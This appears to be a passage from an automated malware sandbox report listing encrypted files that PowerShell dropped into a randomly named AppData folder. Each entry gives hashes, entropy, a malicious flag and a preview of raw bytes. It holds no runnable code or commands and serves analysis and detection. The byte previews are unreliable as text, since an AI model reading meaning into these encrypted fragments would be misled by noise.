C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\EVdXtaHehiwUYcRjQLb.MYlOzZwJQRUXqPScv Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	119138
Entropy (8bit):	7.998444923985271
Encrypted:	true
SSDEEP:	3072:EEAoxRzEbu4aNwyIXV7bj0IsMNzCIMDjh/hi4Kne9d:D7LzbP6l7bj0SNz03hZi4qc
MD5:	77805BD4CD3072D5753918412AB15416
SHA1:	0D2949DCE3AA2701DADD97E8B74980CB493232F6
SHA-256:	EAAB7079A3E04DFEE3E9F76A2743B30064D7636C99E8DEF4CC84821EB9D752AC
SHA-512:	69CFDF02936EFB0521813581BF88F18663F9A3CCC9176C450EA32B8FFF5E76F831783679913A67B78C6AD8FE85DEF66A0E25B8D00BD1DE01D21752E720EF36C2
Malicious:	true
Reputation:	unknown
Preview:	..\|..L....mG.<.O..7.7".zV.S.......g7...Bb./.......t..0...B..d...p..47<.&...`F.3z'.6-...T?.S.}.e...${.y=PF.%...:.0i.)r.Z`........q;.d.c...'A]...W<...S..g{aw.bp..x.....v...W-..VP...'..)P.k?r.....4.sv ..M...9].!._.s.e..u..{............@;.E.sQD~.`......1zIS,D8.tD>.\|M.G.~....]%."..m)..q.....\)...V....e:.M.r......Z.......}.......#..........^F.>W.BS............u...&X...!..)>.....)..B:!.L...+...w...%..^5.[...Z).r..=..7^..".dfm3M...V8H.........P:.:... ....#.}..Mf.]...;qC0.}.J.2S...).5..<.....m.4.?'{.A........-i..$.....C...+0l...T...bE......m..YH2N.e.8....\...g.~..<....y..}:.p.Ue.8.BI'?...)..U.T.%....jM....4....k;Qe.. ..a....tKEIQ..`..S..L..?.....g.}.l_...`...@N7.a.'....7K...D..w.9.Xa.F.W.1.&b2..$. T).5..b...,(b.cX.....1zG..\|....W....,.YUv.v_.....$..$..Wr$?....Q...a.....D......Y.K.3...,...p....,&.C.Q.P~U`S..@..y.PM....Xm5..)...v._......W...jb....<,.m._.H.e.\|8x.X...O5^.....v_..X.J.."3.l.Q-...2..C.%.../....u>......r'5..}j.1.....e...S.oq....K.V

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\EXUembthpnPBlZjHD.AWsFvpyLaR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	88212
Entropy (8bit):	7.99797615704159
Encrypted:	true
SSDEEP:	1536:0cAMhmSji4gGa9vnNYRXxgNZ1YyTg/QZGjDQ+2dU8d3c1c+aFx9FnodUeVs1iAnw:jPXohnNY5xgNBFfdU8m1cbFx9FodO3w
MD5:	D65B0DEB8ED08751EA7854266FCF53B5
SHA1:	97939D555A809980ACBC8744BB34E9493AD47AC6
SHA-256:	10A36184D88524299DE2B2F056D9ABBFF38BFF66AEA30388F09F272FD9B23C32
SHA-512:	61CC1CC2D8AA0DFCB22A6882E64D0F699009A9026ECF1E117C63E0B0CF56C260D66C6919137D8567435BFB38CB1DC0FFF7892BE3A93BAD33FD9746EA15E5DC7D
Malicious:	false
Reputation:	unknown
Preview:	.=\..Wtg8..P...;....x..-.Ia......At...:Q....6o.h...._....}.'...RF....'.Z.?L.w.I6..v...C.3.B{.f@...fW?.....P.co.....d....tS.......@.......r.;.p...`>......&..z..". s....0..c...T.L\...'...1.B..N.im..U....V.....-7'....,.R.......^............p..Kp...0..'...G.0I..y.P.y.\.J'..y.....d........n?w....>..2a>O.B.n.x.,NI.....r..<...:...y.1jX......O..(.........X.D:]....H...N.'ze.....-.m..3a...Ve.b"..g._..........eM.0~%..RC.{3...X..Q......@.\|.i.q...2.".WW....X...E..N.......K.....B...`.?.b..\| .}..~.s#Dc.t...I~..\|...`.4.TH).'b.h...G...m&.......Ip.s..(.]...9.g.rVt.ny{....^..Vh/.......\v....3>..+xU....[...DDe..1.S.y.h...{.Q...o+..~..C......4......@n.E./....v.L..m.$....:...z...S.. .L.=@x...F....V..c{.,.;.v.......K..:.....Sk\|.VN.N..P^Z...:..`W....=`A...M@.1./pX.<..0.\|.>.g..~Y..z...X.........A.~.....-.!\|Y....JR.$.G./...b.t.]...>./.-~X7..BxA3bwM.\|x..(.......k#..F.R...0..t..vQ..R<o.+.v...hdq..Tw.6..L...g.m.....U..T.x..E.).}.4...f.8].....4...5.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\EcPUeYKRrDmdQI.CfvIrSklDqxVipyd Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	86721
Entropy (8bit):	7.998148928673914
Encrypted:	true
SSDEEP:	1536:mrAEl3VPlICVL4QBUy+U7xkTkeztjE7qBS0cNDoVL1HgXk6s:mEEPxkgUXyx2NztuHcPHLf
MD5:	FC50E45703B1C8E50574D2C4C65A5ED6
SHA1:	B26AFA5E51481C61FEF6D559744A585EC6870559
SHA-256:	DAC24EA13546E6DD58359AD42E36876FC2556143BF0B1286AEA005B95C7E00B0
SHA-512:	906DAFC7FFF3DCB03D3BE6861034B8863D98162C7D7AF1D0AC929E8ED3A53551EB7D67DB92555E903D89BF43022870E8E109BD52B25AD2FF75EB0290D3BD3D71
Malicious:	true
Reputation:	unknown
Preview:	.......-..Li.............^2l......M..`+...I.Y.....9.....j..Z(#..b.x.>.../%L.,.=...`..B...&e.k...8L....t.Z...f...xI.og....:..Z.. ..[,...gr.I.Y0..R!...If.........Y..]qhW..\|.........a.\|.._.....r.en..O}.[...Y?@$.F.........gh.ob..(M.q@p(..k.. .....{..p#...xP.,.J..hM.j..\|...,..i...E......-P..r..Y..e.3.Z...q..1 ...My._Q.........E.[..e.]O..2.07..2y.p.........+HN...i..)Hl......wnbeU..._...K..kE.9...E.{..K././c....&)..... ....?X`=....P.V..S........}0.w....x.5...w.3...6.I.S....b.8..?b.M..z^Wu\|.....IF}bo.........8....Q.T.....7......V%.q...FF.LA+...(p..;...9.,S\..F.n..m..t.G..na..hk...!^.J....y....E....o=G..u......+..!&#K.Z...`.~n.#h9.T.!...Bw...+.:zg...l.oc^A.H..L....(..S[.E.t.C.!......4.=K/l@..].C...;...6)..r.Tq......;U.e.$.XD....gC.M#2.......}.=...Q.l.."......-..~_.h...$I..B.K.....wY.....F....Q.k....;.[0..8....s.:%.b....S?]%......u..;.0...\|X...Z....y,....e...[.n.bs..p.......:I.[.CF...[dTN2y.M!.L/...(.._...N*.@...c..\|...!od..y.L.....O.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\EyhsCdbWfzNovaulc.EbSmYdQTBR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	175655
Entropy (8bit):	7.999007054185365
Encrypted:	true
SSDEEP:	3072:LOu6obf0XSgy+rRWRyolRVgHm/kb1CKq35QSvVSOJrc95FfKCelXcaVt1oK4xFOd:1pbfSn1gEovAm/kbput0OJrc9OLcaf1x
MD5:	B8BBA54B3E4AF865B78B062339EE03A4
SHA1:	73774EDAD78D8B159F9295E634BAE75FC1BBB047
SHA-256:	48E8F0B45A440C62A67513A3D9A4ECC55880C3322749C3D0A37A1C2F019E9439
SHA-512:	5D3AB52EB518E56AB6947C3680C9792E90DA8CEDC62F420A305DD511E217226937E152E7C27B387596A98FFA5679EECED8F425FB04239142ADFACC4CCB2D2511
Malicious:	true
Reputation:	unknown
Preview:	K.M.z...n.k...A...J.{e.!Z[..5...L.......]@v....b...[.?..d.Ck....../...~........w..M..[4.;..K...u..Q....6...j?A.5..}..{H..J..$..L....Ba/`.^.a...[......I...z..~....4,.d..!...z..h....H......C...L..k_......_6.......u.....4....}..;...#.Le.=.il..{(53.iu.....J.T..H.\|r..^{.7[h.w!....J.b.@..U.F.....${A.1.._Y=l..V. -@~n...<.F1K4..r[.R....&v.....$..&.vj..?..0.}.+d..<...\|..X...Ih.!1............o....p........c_.\.K..\......6....6}...6.d3=......\"SH..F.....a.?-..N....)u.k.?D..S.V.d..!)C..p.v....8.Ff...........?~c...x...g.M...wQ.......].......C<...Z.}....K...w^.4-p...n..s.C.3.yNS.}..>D!=.<M../b....~..f.2..[........P..+.f.1@...]....e...`4..R}...3..{4.58.zB....O..k@....E....<_.U...9.Y+..KZF..0.....!..6..IU...Po..q.......p...E..c.j.. .aV..1B.H.=,...-_.M7.?...r.?...Q...3..X-...}...\|=\|\....T.1...C.)..K.a.../.R........~..~q..Qn.T=..&.2....D.7$..\|&q\..T..L...e#....O....U...9t.]......a..s.3......9L.M..t...j.s...3#...e..>...].....N....a..>/.....K=..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\FWLQStHgem.sDjqLMnrdIgm Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	194293
Entropy (8bit):	7.998907146645731
Encrypted:	true
SSDEEP:	3072:o2bz1SuJB/6+MV+hxZdY5E24UgBMundO4vMG7VIe1E0Ql9x3NNqX4a492JkKYRV1:dz1SqpMV+tK5E2+BhdOI7VbQl/3WX4ak
MD5:	A48DE0E7C0DDD0CD263B10B95F7DE5CB
SHA1:	F86CC6258DD3A4FEEE6952A41B36D9D2486A3600
SHA-256:	9A384D9F28DD67685DE44BDEB7584E3B3A22A17C35800EC3E3B1ED8BBBD98780
SHA-512:	7D237ED41FAA099C513C9785C4531B644EA2A86CAECD639ABAB5353723915C0FCECAA392E1FE4E1B5D406D79BC4F9B6D3611CCB951EF01B113B96C07106D0F50
Malicious:	false
Reputation:	unknown
Preview:	...\[.QYl..4.......Y.C..sg=.1.c..2.`..'?..(].j.ciR.$..h[..I;\|Ee.cD...q.t...{...S...u..F.z+... W._(D..y.....y.m.4.n.+...b..n.[..;...L..yOf6P..s...3.lR....0..,>....RzG.LqK..3.....j...}C5..IO..&s....nM.@..Ff..<.c.6-...]dh..A.<X...Z..\"v..x...:.e=..=.....Ck..)K..W.......M..T....B..I4m...6.,..>..."'U.,=dY.(.....a.oB..c...../..Vr. lt........z......SJ%5...t.).)V......x9.M..-+V..9!.'.....g.._3....P:..-....H.(..S...i....a.{.ksV....&.z...._..n.W.1....@/>.8n..}.>. ,y..Z\|......#.9.'.;j....P.H.z./.7...a.2x.\|/.aJ.I.V..sy5....}..8....@......z..i....$.-..\|.._....C=..^......x.....{.w.g.U-.h,f.U5l6k..G6..}3.E. ...8.././1._.)..L...p.]3...aQ..H....7N..<.uQ..kq..9;.;.".vV....H..;.....}.4.....x...E._...X...,^......z....9"..sMD.b..pS.$N.....3...4..>y%..t.5..3]..O..M..~..if.Le"J...{XRe.G.'O.XP.1..n.M..U$.XQKD...._...b54.NWOC...S...j.]&3F...T.=.N.....8..CO...B?..I^..l\...(l..^...%.>..{... QL...........*.I...8.D.....N.r.].E.2...?!..j..e.+3..DI./.@..lG\|2

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GRbELdiIJnlAOmTa.glCSEvFZnNDyubJUmRV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	96788
Entropy (8bit):	7.998386367260908
Encrypted:	true
SSDEEP:	1536:iGq5smhA386ntYm1BgsPa27Cv+v9vBzlAcvGukIPMq2bkZPEzopmXcJDJ7:Hq5hhi5S0BPPTGeR6c+uT2YdvpmXcNp
MD5:	95E02ED29C32233DBA6B940DB2FB3274
SHA1:	3AD52132752308A2B6E70836AB2E3745EF399A4D
SHA-256:	70763DE62E01B93B95EB15F4E6B177F2D7466F68DA38086040F4E051E083E768
SHA-512:	8AE5542543B4D6EA1E84B2A441858077F5827F1151C0FADE27D7505A0A1C6765E92CDC207797560E3EFA427471C75B44C88EEA1F6BFBA99BECAA1488CF35F4B3
Malicious:	false
Reputation:	unknown
Preview:	O.}3.C,...>...$......oH...m...W..".......T.<..]...'...f>1k[..cL..t.Z(..&..^B.1..,.p.]r..1b.4...M..:Ao......9.$?.P..t...(.'..31.:b...).U.\.u8."....Z~.{.."..e......v..xc.Qt.....s....K^NNva<..m.$E.m..?..y.)L..q.w:..-X..}be<<l....]..d.....5....e..\|....Uf.....Ec.".Gm...wL..{.nM..tgU.p.9...w......e...a....s..k3. ...........M...........K..D......"..H.B..R.....L:Fy.MG.3G.A.B.p..L.x......\|.F......z9C.@..8q..c...XK......e..c/.J....W8M.Z~..(....Rf....$......A.....f ..Y.....Zw.j.....a]]4..=-b....5.E.... .g..j\dw...GvT......S.:..B.%."j.ap.M..)...\|.8.....H.l....sR..~...u...!.Q..ta...4....w...ec...G#......$'...;J.f........e..Hq.yPe<.A%....o_w.U...H.x(.G.d"r.j.....S)..pND.....CE...)..'z...4....0......3...qv.-._..#...4..m.N.\|Sm9.C.r.Q{.....f$..'.F...(..8ju.h..<K.H.8....Dn.aI.][..`E...rk...m-..)...:u.d...1{. b.@.....,z.G..\..v7o..!Y..F.6....`,..k3EM{.........k..@...B.9.../.f..).9`.#:S.i<...8..SA.W.9>nP.G.JG........m]./..Dk..!/$G...."B.w.h...X.v.O.V%W.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GTMmwYBvHkCSKeOoh.GNAbfUMJLQrcOPWY Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	87935
Entropy (8bit):	7.998092014704282
Encrypted:	true
SSDEEP:	1536:Cx1CHE4E6Li+HV+ZF+EmStDi0D0DJOFOqgu1ztTidhY/HWOx7TNA+dWD:s11Mi+HAH+E5tDv0DIFvzahYPTDfID
MD5:	E669B05CBFCBA5CD331FDCFF13B366D7
SHA1:	052620E8E73727C1D6CFDB00A762CFD9AEAE5E02
SHA-256:	E386EB75201F18F3AC4019A45D97E59B27C68B156D0BFD38C685CEC62A6FA82B
SHA-512:	C108C0F27421C819EDF83BF58F85458A7AB5FEEACFC147541E0FB3C36E2ADC23108F1DF23D95A6DB72790CBF4DB3C35E7289B58D95CE894DD5AE02F475BDF72F
Malicious:	true
Reputation:	unknown
Preview:	:.Y.....QF.40.(P.a..\....[SJ..-.0..h.4.Ja...1...1M}..s..W.Z.....i.#].I-......)..5Q7..R.#NHz..{5.._2._.. .;....\....\|..e..:...A..l.2.....i...oDRP.........$..l\Zcd.....#.r.=..I..bG..-D.q~.{...n..?.(Q$.....^H.<......."&;...4.1...w=....>A).....[[.X..+....U.0....,.....H..y....y..O..LT....m...8........&.p..3.W]@.D9..h.......A..\|..2........%.....x......e.WE......d .w%=...........H....Wg;i...2.x:P..\|S.7./}.o.=//.....\|.......kF~..c.du....h.'+.../.E.dmi.M.?....t.m.... .$..@..;w.E..^...hGyt.....b(...$..?V....).1(C~....!..J e.#.bR...!....d.[oO...[8.Sm!..K...G."..;?l.".7...8Hi.../....v4....DY....]!.9..cU.X..._...i%...8.LzQ..;q...%.\...+q.V.S.AA%].bY....#U....&`.:M.,NG.V].X'.i~............/.nL...Cu.?.:...O....BX..<.W....ir.~v.....P@E....}. .P..qHp..k."..D.....P..YA.z\.w\|.I\u.....LC=...\|@.._]Q..I/Q.[..Q..kX./.m..\..$z9...\... .._..{I..C......s.Y.....54z......3......jQ....).e?...;..nob<N.%..?=%F..lk#.]....3B.4.9U...?~-....E...[.......d.J.Pk.`...GU.?h$

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GWilEVmdoMex.ahWYZtVgFDrdsqAcmK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	67082
Entropy (8bit):	7.997048587201271
Encrypted:	true
SSDEEP:	1536:3TlgVSAV9uh9WAyuNw9S/RCRqFELLSUV6lAhzuRCK+tzH2:D6Z9qSp9SLFSV/zuRChW
MD5:	B7533B0570FC0920B270F2FD4EF2E716
SHA1:	1C3C13E3B5A57CE1620B560895D54CB224E54941
SHA-256:	57F864741A4B9A276C2625B38F07D963A106C3680414A32D1B55D1C713C35546
SHA-512:	6D27194B3DBF00FBFC185FD4CDDB0C646CCE47A48A12A007F49F85B4D8FC29E9C22C409D9376E693142905F905F69C55824A0F4D39CABAF7061216DED9DC1606
Malicious:	true
Reputation:	unknown
Preview:	H..~<=7.........KQt..?`....6\A2(]..M...o[P.f..`KGK..W.R..iYzZ.<H.Y......7...W1S\R...;.T.4.-R}...O}H..eI..h $B.h7....,...h.p.u."X........0..$.M_.....j....EX..F..M...9....7I.K.'......*..8.}.{.e<......q:A..3...j....1+.#p..m/.^'.....`.$;..D..>....G.a..W....\|..a...y....W.p./>.."._..0.l...6..{..(.e....d.......Z.^..7......y.Y....<.\&Pb..?rE`..m'...-.1UT.(U.L..3.k....Xn9EtCiL...1b....).n'.Q{...Ss..$.&b.F...k~.&.Y.hqu.d.@1a...iW.7...g`h..L....p+a)....z+....\|..rF.~......M.=..i...8.-.kf.3.o..b.S8...9.-N\|l.O....Z..P+CD...F.Q.&...........0.UK!{h.6S.\(....O..F.@.u..[.BP..ED.p.u.u......W;..`.K.$....E......7..OZs.....E........K..u.[."-. ..F.E^}.+....l..../..Kh..w. ..6....F.Y7.s....9..\.4...F^._.o#^.....7.Y.^...]Vb.<.g..........b%..8...uC.wv....,h.......y.....(8L.].rp._. ..m.,......m..\|.W....s.?a.9\|..Zoxb...T>K.W]....+e...Me.,..'.-.....R .fv'5B.~.0..L..L...m....\|.P.$#?.D.~A.."....3..W.E.k..._.......d../.~^.g..u..]...s}.1m....W^.>......x.H..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GXczwBDkjLlVn.tUMAfbdjGKYRez Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	171567
Entropy (8bit):	7.9988413533837415
Encrypted:	true
SSDEEP:	3072:XtLxQGaLjVZnYPrw8ZRwuTmVKJxl/uxUmVXZOzjR46wyctLUoY:XlxQj3gPrnZRwTVKJxl/2jTUo9pY
MD5:	45D41532ACD48B95EEE6F652C3B8788E
SHA1:	7F48FFA10EFC4172CEDC7CA53B12BE32715C7D06
SHA-256:	42820ECC5D2A10FF5EFE6FB4197F83AECB2702518827AEF4C94B132E07A83F16
SHA-512:	BBA2184EB7867C19C7ACE6CD508E6AE45227DB5DFA1D197BE07AFDE6458D6D524BEFCFEFB3A0A94E8DBF06BF05FBD9F62182AA30FB2570CAC0F711FB5CB611B4
Malicious:	true
Reputation:	unknown
Preview:	.jNA[R.....={..`..R..1...;......b$W.]......\|..F.h"...A}....%..fxx...n.......p.t..../w.....jm.....[...{..."...z..V...M.~.;.[...^h.6.uK.)yT.[.]7......#...!@.[........ce.m..#a.w....EE...T...fF.q.K#.f.......z.a......S....Z...?.g.S.#hv..s....h=.E.g........c..X.6.e..+.=.q.z...kQI....f.G......<.2.w..<.A.e..~.I..U...{....c.].tX=.O.......9...1.\..D....x...d.y.I.FO.8.q..B.:..2.........:.4M.{.".V....0s.=..`.%5B./.bH=...a.0.G.u..A.$T......4.F.5<&.}..$0.i~..^.m{-.ec..h....N.x......k..X4..M./:..[R3.K\...y8....GT,...G..T.....p\.}&c.V:#}..?..Zy8Z......._[C..e.....b...k;.m....c..........`6C.G......e^.....6..,K...C.... 7.@O.Z..H.]...D[.;jp...8......}.j.3[v....[a.2.....}$....6-...@..'.......5.Jp.....K...<.S?q..........V..9.o...E.2...=.m.c+.b..%<..s..:.j...y..BL.........=.CT..@.~<yK../...B. K2.....F..T..x..8....n.~#.........!.r.$.8.....e`...I.\:.^..-<i...5..Vy....Y...7NI.WZ.Z.]:...i...F.<...[.t"....... .eUx...>...r.<.5.C/.R..T..w.{.l.......V.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GfYstgFhvHkdpQ.hjFQHYbUyNtIXVMJqgT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183888
Entropy (8bit):	7.999037736976015
Encrypted:	true
SSDEEP:	3072:9P5U3tBSDc0sKfvCY85ysUKO080v9eGEsdveEQZrFeJDuv0ms:k3TSKMqR8dq80vHJN2rFAS/s
MD5:	E1AD4DDDB93875BDF958A82878E76A57
SHA1:	1AA267719CF06136F0AAB9D9F3C77D462E388EFE
SHA-256:	C7CE1CD1D118A158C6049EE0C1E28D5870994ABC4B463DEFF7B4F379E6E8226E
SHA-512:	A0CDF50641DF085D8551E7E130BD5568BE68C89A99881B116E611ABD44721163DA8326F86BE75FE9693018B3962B69D0738C39B7233272BD3D58C054244B8754
Malicious:	true
Reputation:	unknown
Preview:	. m.'.<.M..@.....F....l...O+.v...P......?..:.6..g..`...-../$..g..Z-:..!j.....2.......M.T9......].UC...\|.z.j.V..ndY.O.m..C....vS.?...Hm.....9=+=y.?x...1.........$.r......X\...G..D...%...Z...."L....i....p...<.>l.~.:1L.)...^Y..T..@....l...i....N.8.{.U.f?.L3....Ay...e;..@z.a...VB....@k&.9t...J.X..S...."%..{..r....VV.1+.U.r..UX..N..c......vHA9.?d`z....\|].S.d/"..$.=.;...w..\|K8.F..\|n..W..Q.0..../Lv.$.e%r...M...=C..1.q.._.k..).-......gf..#46..F.q.....Gki...s% ..N.V../..g.(.Y.K.......hJ4..F..$..&U.V3.M..A.`...x...H.E...pio......zQ..~...%M......@.g...P..uw=..M..'/..Ql=.5...}..;V..:.}.........B.Tt..<..^.......V.s.1....b.br....A)^.q.........ftG.!..z.D....m.z2..D]`Y...'..F..T..I....?\..F.....!..s'S..."v...L..l ..../.........m.Q?![.....a.-.._..qo".e.Fr#.._....bB?J.....H>.6!.9.hwKM.k..r.......A..>.V.....f..eG&.Y._.V.n..\?J../.l.....B...t(.(v..Ek#,^K....`.......+.H..g.... ..BZy...:&b.M.../.k1.w...N.E............0........0=.]...7.T....kF..aE.k..G..J1.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\HbLwQzMyShrm.HYRjDAQCbsWSOvfMZpP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	185651
Entropy (8bit):	7.99904800777525
Encrypted:	true
SSDEEP:	3072:1ZTvaQjZrUx9jqDMcaJjR5Iqv+EkqS2qu/BnGmdHU6hcRTV2d8ZRkd:P7DxUxIDMcmV5Iqv+EkqDqu/dHU6cD8
MD5:	D6C0B81B7A933C94D2BAB2537114FFD9
SHA1:	584A001EBA584D0CD1C5C5B8101CD2FC2FAAE64E
SHA-256:	7685111FA103C1F75D8F5C27743A555AE635C2346B07BB3BD4F86DA8E9ED5353
SHA-512:	A5727A5C64F2C8645FDE0F21718B2F0E9A49F19E35DCE0C734D0345605BB681EB9A1F5C8D23015AF34939BA1D85B17F1EB3988C6D9855C02BE0D7C137D61B299
Malicious:	true
Reputation:	unknown
Preview:	.....hy...V.a/.Sr.Pb2...........i.3.~..)...c.(Q.oMf...\|.d...!U......t.r..5...&Ba..7l.....,.Z.e.5-u...2V...x....>A..$./.+.gH......v.dXc.d.....G..S6~....p..O.$..,.n..4.\|.....T...\l.........U..&<.k._am.Yu....h.jP..L2..j91.<(..=..bI...".m..f...Y...8.....U.8.&..f....v...V6...+.u.z.k..}....F.].%..Z...).......N...bS...%..$....t.W.) ....7&...?a7.m...M...%[.%........Au.k....U..r.uG..........m....xcs>.V.g...@4v.WT.....a....b.!.(}.m.Z7OB6NJ..J.+m-.Q.......:uAl....S....v..r.k:.....>.........\|5./"./..&@hH8....L....5.V~ala....Lr........Lbi.....D...R..c.y/....9.+:....$...M....V.c..\|A......Z..mE..h...+Hp....c.-...!`..../..?.+.'.......W..R........}G!...6.C..j...z.OGt...m....'..A.....\..[..0..I.8,.}l..iY.......j.k.Z.;...{_f_.bR-k.%...!D.A..]...B.H.A.=.R...>.=3......U}...........d.X/`...5QI\w..7.....V.P..0..X..:k....._...YB.V......}.H...2q.....D..2.L...^..:..g.4..hq.^Z.#...G...#.E..a=.q......w..yh;6.}.G.v........X~..d.....9..3.....i

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\HsTaxCAdVh.ApKewZugPMWmDzvyai Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	96146
Entropy (8bit):	7.998293950764622
Encrypted:	true
SSDEEP:	1536:WJLRs5KL/DXzYQ+fgaOlhTA/b5m8AVZIeYGQVtNHaWa+bQw51tFn12GXnRVYBKR5:ObDXzY1gLAj5m8jeYJVtva+cw5X2GQ3O
MD5:	416814FA96C5F7260C95EE149DBD2120
SHA1:	4D0E86315B0D2BE35A2C8F0BEE96B4595C94C9F7
SHA-256:	A239BF967FBA7C9C301E8B826149B6209A479DAF706147BEC37B96CF343DD91D
SHA-512:	987253D27EA0744E7E58E18137AB697C174C457931C040EF3451AC8D09CA179D770FC78C32A4FCE6891962458C528C3010EC8992CCB702257B7B4D81F43BD5F8
Malicious:	false
Reputation:	unknown
Preview:	EFP.<.......%.@..B_.....Y...U.k.?..E.7.y./..B....-\|.......S.^..:t.(P...+.k5.?.H.=....V....21u..X@_..e..`..UV..r.\|Gz.'..\|o/...k.X....a..a.H.V.\r...Gb-1#.7m6..f.9...w...../v.%..%.is....z$..z.J..Z...7.....N&..d........d.'...+.....).{.."..,..k...Mw.T%.......y..IG.K......:..g(...s..v.P.i.N.-j..l..WX..\p...k......i........r......;C...a..{...._'..(.....'..Kj.-.SQ.)."........ . lukb.w../..Q.k.<....O@..X7..{J-....~<.D1P..H.G.....O\|.5.JV?...G.D..2...M.\|.D..u.nN.:..U...r.9..Z...N...=....,{.O&...........Bc.8.,.c.Ye.U...u.#....?}.....>b.a.5#.E....n..kw..T....M. ]v......R..u..J.....rG....y.b.......u.......h..n[..s...X....c...z.Z.\|..d..........5.g.Y.H%.'N....V...K3.>..f...T.\a...J.~.x..r&8....'7.&....-].W..<.WN...T.mV.`.-.6Si!5*k\|...\..a}..le....dB..5..-'....3.KW).....3......Cb.).......s...e..?.P.l.V.1.V.i.YL./3.........#...\|....._)9......k.[a.h....SX.=........3M]..55'\|x......+lx0izK....j/.X.....Q....W../..sJX....Z.7)....>..Zr..p...\q`..j..B

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\JzvhPoFDRHdYI.EAHsBOdtVWUSGD Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	7.178855224242884
Encrypted:	false
SSDEEP:	768:IQMtEybwzzDhc4OMTkMCrSKy15ScDBwWQzvjFAg6xparPVr6eR8u0TdnV:qtEybwzPhc47IMCWKy1zorFuxiNmNH
MD5:	2DC7BB5C709188C25D66E88A7D75210F
SHA1:	8C076870ADBB57BD7E3A555A82229D39C116C387
SHA-256:	0413934D2DCCEAC577C5939DD30F0F2A1B643A3D165BBD42733DCA4DDB8EA3B0
SHA-512:	C66A050A061FB5E00DE26E5EF5C845F9B48001D373D4BB886696FC2C771C5770DC96729F97445FDA0FF356891C555F2B94D29429C0D51401C1FCD5C75571C6DF
Malicious:	false
Reputation:	unknown
Preview:	...aWnlwgVot..Fy.V55cWxT.TxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6.iNhkK.<J.9.x.f\|.t.9.0LI.9.F4\iW1.W[!.,.C..?r< .&}c.$\.1z[O@AHxRO1Zz1vJq.FY9.}3c2V0Z0l1.Uf.DI{4M.d6c^d8ZnJr..B8fLpJQ.NlNChQcMpefiBy]XFCQHU8IHZAYGthN.BUN35vQHZWHW,.MWwjJ{BUIXxyQVVEVEdAIGF3Z0BSb358..BK.09Ae.VD~o4xaXV8QF8/cF9eT0NIe.B1\DY/PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMgpt_mtGKWN6diNhmtd2.W0xYXg0UUFQJ7.A.Vp4.NI4PM94U.NwchtQRUN5b205I3lTtVBK:. ,1Zzy0JqM.Z9USZRc.V0Z0l1IUd7OHp4.FdvM.T5.JroEB8f.pJQDNlN.hAcmpefkByYXFC.HUzMHZAYGthNkBUN15v..ZWKWle.WgjHkGU.1hy.sVEWEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/CufaAnlwcVotc}n.UV?6.VxTRV\|.I3Fue299pIS4dFFyTVdvO<qtWi^GXgO6ciNheTd2H,2xY\M.U}cQdEl.{TX3U1C.C]84^3Nwbjt@R'.6bB:.I5FTGfCJnHxRN1Zka.pqMMP.UQpRp.W0J0l1HUd&O`K4ML..cXn2qnLXpuF8kmpJSFN}N=lAci]vr.D_YX@0qHU2.LZA]lt.JkBQf.5v[n)jKWfo3RgjNFQA.^OyQ@%eVEn.\GF7q0<Vb31.pGBA\|&2j.0(Bfl0UrL.>yF8).f9e^.HIeAi1.BY/TmEaTdJqaQw.wXFsuU75c.FTV^PEK3LY.293.8R4i`8~TV`[^S.r~mtA8wN6n.IhePO24P0x]pF0U_`Qc[42bT.'U1C,..;".2C~Y....+F5b6.&

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\KNmfPuUXxeJLoaFGT.hdZYEPpSVXwoUig Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	175065
Entropy (8bit):	7.998933590478529
